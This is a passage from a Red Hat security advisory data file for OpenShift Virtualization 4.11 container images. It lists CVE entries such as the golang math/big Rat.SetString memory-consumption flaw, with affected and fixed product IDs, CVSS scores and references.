"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", }, { cve: "CVE-2022-23772", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053532", }, ], notes: [ { category: "description", text: "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", title: "Vulnerability description", }, { category: "summary", text: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23772", }, { category: "external", summary: "RHBZ#2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23772", url: "https://www.cve.org/CVERecord?id=CVE-2022-23772", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-01-19T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", }, { cve: "CVE-2022-23773", cwe: { id: "CWE-1220", name: "Insufficient Granularity of Access Control", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", 